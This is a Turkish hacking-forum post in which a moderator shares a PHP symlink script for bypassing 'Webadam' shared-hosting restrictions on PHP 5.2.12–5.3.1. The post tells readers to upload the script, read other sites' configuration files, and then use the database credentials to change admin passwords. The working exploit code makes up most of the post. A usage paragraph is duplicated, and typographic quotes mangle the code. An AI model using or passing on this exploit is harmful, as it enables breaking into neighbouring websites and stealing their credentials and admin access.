G3nzo
Moderator
- Katılım
- 20 Eyl 2012
- Mesajlar
- 1,992
- Tepkime puanı
- 0
- Puanları
- 36
Webadam Biliyorsunuz Başbelasıdır Bazen.Ama Bypass Edilirse Ödülü Büyüktür.Çünkü Webadam Serverlarında Her Zaman En Az 3 Heykır Sitesi Bulunur :Z
Neyse Ben Kullanım Hakkında Bilgi Vereyim.Php Kodunu Server’a Upload Ediyorsunuz.Normalde Config Çekince 403 Verir Webadam Serverlar.
Bu Shell Yoluyla Edite Tıklayıp Configi Okuyabilirsiniz.Sonra Da Basarsınız Mysql Connection’la Admin Şifresini Ayarlar Falan İşte…
5.2.12 – 5.3.1 Arasında Geçerlidir.
Neyse Ben Kullanım Hakkında Bilgi Vereyim.Php Kodunu Server’a Upload Ediyorsunuz.Normalde Config Çekince 403 Verir Webadam Serverlar.
Bu Shell Yoluyla Edite Tıklayıp Configi Okuyabilirsiniz.Sonra Da Basarsınız Mysql Connection’la Admin Şifresini Ayarlar Falan İşte…
5.2.12 – 5.3.1 Arasında Geçerlidir.
Kod:
$fakedir=”ajanlar”;
$fakedep=16;
$num=0; // offset of symlink.$num
if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file=”";
echo ‘
Kod:
The xatlivacip
Script for legal use only.
PHP hacked_xatlivacip@hotmail.com – php 5.2.12 – 5.3.1 arası symlink
’;
if(empty($file))
exit;
if(!is_writable(“.”))
die(“not writable directory”);
$level=0;
for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}
while(1<$as–) chdir(“..”);
$hardstyle = explode(“/”, $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}
}
$as++;
while($as–)
chdir(“..”);
@rmdir(“fakesymlink”);
@unlink(“fakesymlink”);
@symlink(str_repeat($fakedir.”/”,$fakedep),”fakesymlink”);
// this loop will skip allready created symlinks.
while(1)
if(true==(@symlink(“fakesymlink/”.str_repeat(“../”,$fakedep-1).$file, “symlink”.$num))) break;
else $num++;
@unlink(“fakesymlink”);
mkdir(“fakesymlink”);
die(‘Siteler kullanicilar’.$num.’ file’);